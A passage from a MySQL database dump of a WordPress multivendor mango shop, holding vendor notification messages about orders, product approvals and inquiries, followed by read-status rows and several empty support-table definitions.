target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1278\\\\\\\">1278</a></b> for <b>mango</b>',-1,0,28,1,0,0,0,1,0,'order','2022-03-15 07:50:57'),(243,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1278\\\\\\\">1278</a></b> for <b>Alphonso mango 3kg</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-15 07:50:57'),(244,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1278\\\\\\\">1278</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/testmango/\\\\\\\">Alphonso mango 3kg</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/xyz/\\\\\\\">xyz</a></b>',25,0,0,0,1,0,0,1,0,'status-update','2022-03-15 07:52:57'),(245,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1279\\\\\\\">1279</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-15 07:58:20'),(246,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1279\\\\\\\">1279</a></b> for <b>Alphonso mango 3kg</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-15 07:58:20'),(247,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1279\\\\\\\">1279</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/testmango/\\\\\\\">Alphonso mango 3kg</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/xyz/\\\\\\\">xyz</a></b>',25,0,0,0,1,0,0,1,0,'status-update','2022-03-15 07:59:08'),(248,'<b>#1279</b> order status updated to <b>Completed</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-03-15 07:59:15'),(249,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1280\\\\\\\">1280</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-15 08:02:38'),(250,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1280\\\\\\\">1280</a></b> for <b>Alphonso mango 3kg</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-15 08:02:38'),(251,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1194\\\\\\\">Alphonso mango 3kg</a></b> awaiting for review',25,0,0,0,1,0,0,1,0,'product_review','2022-03-15 08:32:09'),(252,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1194\\\\\\\">Alphonso mango 3kg</a></b> awaiting for review',25,0,0,0,1,0,0,1,0,'product_review','2022-03-15 09:04:41'),(253,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1287\\\\\\\">Ratnagiri Alphonso 1 dozen</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-16 10:19:47'),(254,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1288\\\\\\\">Ratnagiri Alphonso 3 dozen</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-16 10:20:43'),(255,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1289\\\\\\\">Ratnagiri Alphonso 6 dozen</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-16 10:21:33'),(256,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/ratnagiri-alphonso-6-dozen/\\\\\\\">Ratnagiri Alphonso 6 dozen</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-16 10:24:26'),(257,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/ratnagiri-alphonso-3-dozen/\\\\\\\">Ratnagiri Alphonso 3 dozen</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-16 10:26:58'),(258,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/ratnagiri-alphonso-1-dozen/\\\\\\\">Ratnagiri Alphonso 1 dozen</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-16 10:27:42'),(259,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1114\\\\\\\">Banginapalli Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-16 10:50:40'),(260,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1201\\\\\\\">1201</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-solapur-pickle/\\\\\\\">Mango Solapur Pickle</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/mainstore/\\\\\\\">MainStore</a></b>',21,0,0,0,1,0,0,1,0,'status-update','2022-03-17 09:56:06'),(261,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/4\\\\\\\">#000004</a></b> received for <b>Ratnagiri Alphonso 3 dozen</b>',-2,0,0,1,0,0,0,1,0,'enquiry','2022-03-22 09:37:05'),(262,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/4\\\\\\\">#000004</a></b> received for <b>Ratnagiri Alphonso 3 dozen</b>',-1,0,21,1,0,0,0,1,0,'enquiry','2022-03-22 09:37:06'),(263,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/5\\\\\\\">#000005</a></b> received for <b>Banginapalli Mango 5kg</b>',-2,0,0,1,0,0,0,1,0,'enquiry','2022-04-11 13:59:16'),(264,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/5\\\\\\\">#000005</a></b> received for <b>Banginapalli Mango 5kg</b>',-1,0,21,1,0,0,0,1,0,'enquiry','2022-04-11 13:59:17'),(265,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/6\\\\\\\">#000006</a></b> received for <b>Raspuri Mango 5kg</b>',-2,0,0,1,0,0,0,1,0,'enquiry','2022-04-21 17:57:59'),(266,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/6\\\\\\\">#000006</a></b> received for <b>Raspuri Mango 5kg</b>',-1,0,21,1,0,0,0,1,0,'enquiry','2022-04-21 17:58:00'),(267,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://gopalak.in/store-manager/orders-details/1988\\\\\\\">1988</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-10-27 12:24:18'),(268,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://gopalak.in/store-manager/orders-details/1989\\\\\\\">1989</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-10-28 04:09:27'),(269,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://gopalak.in/store-manager/orders-details/2032\\\\\\\">2032</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-11-22 06:55:11');
/*!40000 ALTER TABLE `wp_wcfm_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_messages_modifier`
--

DROP TABLE IF EXISTS `wp_wcfm_messages_modifier`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_messages_modifier` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `message` bigint(20) NOT NULL DEFAULT 0,
  `is_read` tinyint(1) NOT NULL DEFAULT 0,
  `read_by` bigint(20) NOT NULL DEFAULT 0,
  `read_on` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `is_trashed` tinyint(1) NOT NULL DEFAULT 0,
  `trashed_by` bigint(20) NOT NULL DEFAULT 0,
  `trashed_on` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=136 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_messages_modifier`
--

LOCK TABLES `wp_wcfm_messages_modifier` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_messages_modifier` DISABLE KEYS */;
INSERT INTO `wp_wcfm_messages_modifier` VALUES (1,6,1,1,'2022-02-17 06:28:50',0,0,'0000-00-00 00:00:00'),(2,10,1,16,'2022-02-21 23:53:22',0,0,'0000-00-00 00:00:00'),(3,18,1,20,'2022-02-23 06:58:11',0,0,'0000-00-00 00:00:00'),(4,20,1,20,'2022-02-23 07:06:34',0,0,'0000-00-00 00:00:00'),(5,29,1,22,'2022-02-24 04:25:08',0,0,'0000-00-00 00:00:00'),(6,33,1,22,'2022-02-24 04:39:32',0,0,'0000-00-00 00:00:00'),(7,43,1,20,'2022-02-25 00:29:01',0,0,'0000-00-00 00:00:00'),(8,57,1,20,'2022-02-25 05:42:17',0,0,'0000-00-00 00:00:00'),(9,58,1,20,'2022-02-25 05:42:19',0,0,'0000-00-00 00:00:00'),(10,69,1,20,'2022-02-25 05:55:19',0,0,'0000-00-00 00:00:00'),(11,78,1,1,'2022-03-02 23:42:55',0,0,'0000-00-00 00:00:00'),(12,82,1,25,'2022-03-02 23:52:29',0,0,'0000-00-00 00:00:00'),(13,86,1,25,'2022-03-02 23:58:37',0,0,'0000-00-00 00:00:00'),(14,91,1,25,'2022-03-03 00:04:53',0,0,'0000-00-00 00:00:00'),(15,98,1,21,'2022-03-03 23:10:41',0,0,'0000-00-00 00:00:00'),(16,99,1,21,'2022-03-03 23:17:21',0,0,'0000-00-00 00:00:00'),(17,100,1,21,'2022-03-03 23:24:11',0,0,'0000-00-00 00:00:00'),(18,101,1,21,'2022-03-03 23:26:26',0,0,'0000-00-00 00:00:00'),(19,102,1,21,'2022-03-03 23:27:08',0,0,'0000-00-00 00:00:00'),(20,103,1,21,'2022-03-03 23:29:14',0,0,'0000-00-00 00:00:00'),(21,104,1,21,'2022-03-03 23:30:16',0,0,'0000-00-00 00:00:00'),(22,105,1,21,'2022-03-03 23:34:09',0,0,'0000-00-00 00:00:00'),(23,106,1,21,'2022-03-03 23:35:12',0,0,'0000-00-00 00:00:00'),(24,107,1,21,'2022-03-03 23:41:09',0,0,'0000-00-00 00:00:00'),(25,108,1,21,'2022-03-03 23:43:54',0,0,'0000-00-00 00:00:00'),(26,109,1,21,'2022-03-03 23:44:53',0,0,'0000-00-00 00:00:00'),(27,110,1,21,'2022-03-03 23:45:43',0,0,'0000-00-00 00:00:00'),(28,111,1,21,'2022-03-03 23:46:25',0,0,'0000-00-00 00:00:00'),(29,112,1,21,'2022-03-03 23:50:10',0,0,'0000-00-00 00:00:00'),(30,113,1,21,'2022-03-03 23:57:23',0,0,'0000-00-00 00:00:00'),(31,129,1,21,'2022-03-04 00:01:16',0,0,'0000-00-00 00:00:00'),(32,130,1,21,'2022-03-04 00:08:11',0,0,'0000-00-00 00:00:00'),(33,133,1,21,'2022-03-04 00:11:02',0,0,'0000-00-00 00:00:00'),(34,137,1,21,'2022-03-04 00:16:39',0,0,'0000-00-00 00:00:00'),(35,138,1,21,'2022-03-04 00:22:44',0,0,'0000-00-00 00:00:00'),(36,139,1,21,'2022-03-04 00:24:13',0,0,'0000-00-00 00:00:00'),(37,140,1,21,'2022-03-04 00:24:34',0,0,'0000-00-00 00:00:00'),(38,141,1,21,'2022-03-04 00:28:16',0,0,'0000-00-00 00:00:00'),(39,142,1,21,'2022-03-04 00:29:22',0,0,'0000-00-00 00:00:00'),(40,143,1,21,'2022-03-04 00:31:33',0,0,'0000-00-00 00:00:00'),(41,144,1,21,'2022-03-04 00:32:30',0,0,'0000-00-00 00:00:00'),(42,145,1,21,'2022-03-04 00:35:05',0,0,'0000-00-00 00:00:00'),(43,146,1,21,'2022-03-04 00:35:49',0,0,'0000-00-00 00:00:00'),(44,147,1,21,'2022-03-04 00:43:57',0,0,'0000-00-00 00:00:00'),(45,148,1,21,'2022-03-04 00:45:11',0,0,'0000-00-00 00:00:00'),(46,149,1,21,'2022-03-04 00:50:31',0,0,'0000-00-00 00:00:00'),(47,150,1,21,'2022-03-04 00:51:17',0,0,'0000-00-00 00:00:00'),(48,151,1,21,'2022-03-04 00:53:33',0,0,'0000-00-00 00:00:00'),(49,152,1,21,'2022-03-04 00:54:22',0,0,'0000-00-00 00:00:00'),(50,153,1,21,'2022-03-04 00:57:39',0,0,'0000-00-00 00:00:00'),(51,154,1,21,'2022-03-04 00:59:16',0,0,'0000-00-00 00:00:00'),(52,155,1,21,'2022-03-04 01:07:06',0,0,'0000-00-00 00:00:00'),(53,156,1,21,'2022-03-04 01:07:55',0,0,'0000-00-00 00:00:00'),(54,157,1,21,'2022-03-04 01:10:09',0,0,'0000-00-00 00:00:00'),(55,158,1,21,'2022-03-04 01:10:51',0,0,'0000-00-00 00:00:00'),(56,159,1,21,'2022-03-04 01:12:04',0,0,'0000-00-00 00:00:00'),(57,160,1,21,'2022-03-04 01:12:44',0,0,'0000-00-00 00:00:00'),(58,186,1,21,'2022-03-04 02:05:25',0,0,'0000-00-00 00:00:00'),(59,187,1,21,'2022-03-04 02:07:01',0,0,'0000-00-00 00:00:00'),(60,188,1,21,'2022-03-04 02:08:04',0,0,'0000-00-00 00:00:00'),(61,189,1,21,'2022-03-04 02:09:06',0,0,'0000-00-00 00:00:00'),(62,190,1,21,'2022-03-04 02:10:48',0,0,'0000-00-00 00:00:00'),(63,191,1,21,'2022-03-04 02:12:15',0,0,'0000-00-00 00:00:00'),(64,192,1,21,'2022-03-04 02:15:16',0,0,'0000-00-00 00:00:00'),(65,192,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(66,191,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(67,190,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(68,189,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(69,188,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(70,187,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(71,186,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(72,160,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(73,159,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(74,158,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(75,157,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(76,156,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(77,155,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(78,154,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(79,153,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(80,152,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(81,151,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(82,150,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(83,149,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(84,148,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(85,147,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(86,146,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(87,145,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(88,144,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(89,143,1,1,'2022-03-04 03:16:02',0,0,'0000-00-00 00:00:00'),(90,142,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(91,141,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(92,140,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(93,139,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(94,138,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(95,137,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(96,135,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(97,133,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(98,130,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(99,129,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(100,113,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(101,112,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(102,111,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(103,110,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(104,109,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(105,108,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(106,107,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(107,106,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(108,105,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(109,104,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(110,103,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(111,102,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(112,101,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(113,100,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(114,99,1,1,'2022-03-04 03:16:12',0,0,'0000-00-00 00:00:00'),(115,200,1,25,'2022-03-07 00:43:44',0,0,'0000-00-00 00:00:00'),(116,205,1,21,'2022-03-07 00:57:11',0,0,'0000-00-00 00:00:00'),(117,206,1,25,'2022-03-07 01:00:17',0,0,'0000-00-00 00:00:00'),(118,225,1,25,'2022-03-08 06:11:48',0,0,'0000-00-00 00:00:00'),(119,226,1,21,'2022-03-11 06:20:00',0,0,'0000-00-00 00:00:00'),(120,227,1,21,'2022-03-11 06:21:17',0,0,'0000-00-00 00:00:00'),(121,228,1,21,'2022-03-11 06:22:29',0,0,'0000-00-00 00:00:00'),(122,229,1,21,'2022-03-11 06:25:11',0,0,'0000-00-00 00:00:00'),(123,230,1,1,'2022-03-14 00:28:10',0,0,'0000-00-00 00:00:00'),(124,235,1,28,'2022-03-15 01:55:45',0,0,'0000-00-00 00:00:00'),(125,239,1,28,'2022-03-15 02:19:23',0,0,'0000-00-00 00:00:00'),(126,244,1,25,'2022-03-15 02:22:57',0,0,'0000-00-00 00:00:00'),(127,247,1,25,'2022-03-15 02:29:08',0,0,'0000-00-00 00:00:00'),(128,251,1,25,'2022-03-15 03:02:09',0,0,'0000-00-00 00:00:00'),(129,251,1,1,'2022-03-15 03:02:34',0,0,'0000-00-00 00:00:00'),(130,252,1,25,'2022-03-15 03:34:41',0,0,'0000-00-00 00:00:00'),(131,253,1,21,'2022-03-16 04:49:47',0,0,'0000-00-00 00:00:00'),(132,254,1,21,'2022-03-16 04:50:43',0,0,'0000-00-00 00:00:00'),(133,255,1,21,'2022-03-16 04:51:33',0,0,'0000-00-00 00:00:00'),(134,259,1,21,'2022-03-16 05:20:40',0,0,'0000-00-00 00:00:00'),(135,260,1,21,'2022-03-17 04:26:06',0,0,'0000-00-00 00:00:00');
/*!40000 ALTER TABLE `wp_wcfm_messages_modifier` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_messages_stat`
--

DROP TABLE IF EXISTS `wp_wcfm_messages_stat`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_messages_stat` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `message` bigint(20) NOT NULL DEFAULT 0,
  `is_liked` tinyint(1) NOT NULL DEFAULT 0,
  `liked_by` bigint(20) NOT NULL DEFAULT 0,
  `liked_on` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `is_disliked` tinyint(1) NOT NULL DEFAULT 0,
  `disliked_by` bigint(20) NOT NULL DEFAULT 0,
  `disliked_on` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_messages_stat`
--

LOCK TABLES `wp_wcfm_messages_stat` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_messages_stat` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_messages_stat` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_support`
--

DROP TABLE IF EXISTS `wp_wcfm_support`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_support` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `order_id` bigint(20) NOT NULL DEFAULT 0,
  `item_id` bigint(20) NOT NULL DEFAULT 0,
  `product_id` bigint(20) NOT NULL DEFAULT 0,
  `author_id` bigint(20) NOT NULL DEFAULT 0,
  `vendor_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_name` varchar(200) NOT NULL,
  `customer_email` varchar(200) NOT NULL,
  `query` longtext NOT NULL,
  `category` longtext NOT NULL,
  `priority` varchar(200) NOT NULL,
  `status` varchar(200) NOT NULL,
  `posted` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_support`
--

LOCK TABLES `wp_wcfm_support` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_support` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_support` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_support_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_support_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_support_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `support_id` bigint(20) NOT NULL DEFAULT 0,
  `key` varchar(200) NOT NULL,
  `value` longtext NOT NULL,
  `type` varchar(200) NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_support_meta`
--

LOCK TABLES `wp_wcfm_support_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_support_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_support_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_support_response`
--

DROP TABLE IF EXISTS `wp_wcfm_support_response`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_support_response` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `support_id` bigint(20) NOT NULL DEFAULT 0,
  `order_id` bigint(20) NOT NULL DEFAULT 0,
  `item_id` bigint(20) NOT NULL DEFAULT 0,
  `product_id` bigint(20) NOT NULL DEFAULT 0,
  `vendor_id` bigint(20) NOT NULL DEFAULT 0,
  `customer_id` bigint(20) NOT NULL DEFAULT 0,
  `reply` longtext NOT NULL,
  `reply_by` bigint(20) NOT NULL DEFAULT 0,
  `posted` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_support_response`
--

LOCK TABLES `wp_wcfm_support_response` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_support_response` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_support_response` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_support_response_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_support_response_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_support_response_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `support_response_id` bigint(20) NOT NULL DEFAULT 0,
  `key` varchar(200) NOT NULL,
  `value` longtext NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_support_response_meta`
--

LOCK TABLES `wp_wcfm_support_response_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_support_response_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_support_response_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcmp_cust_answers`
--

DROP TABLE IF EXISTS `wp_wcmp_cust_answers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcmp_cust_answers` (
  `ans_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `ques_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ans_details` text NOT NULL,
  `ans_by` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ans_created` timestamp NOT NULL DEFAULT current_timestamp(),
  `ans_vote` longtext DEFAULT NULL,
  PRIMARY KEY (`ans_ID`),
  UNIQUE KEY `ques_id` (`ques_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcmp_cust_answers`
--

LOCK TABLES `wp_wcmp_cust_answers` WRITE;
/*!40000 ALTER TABLE `wp_wcmp_cust_answers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcmp_cust_answers` ENABLE KEYS */;
UNLOCK TABLES;

--
